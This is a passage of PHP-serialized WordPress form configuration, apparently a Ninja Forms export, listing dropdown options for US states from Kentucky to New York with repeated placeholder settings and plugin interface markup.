Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"17\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"18\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"19\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"20\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"21\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"22\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"23\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"24\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"25\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"26\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"27\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"28\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"29\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"30\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"31\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"32\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 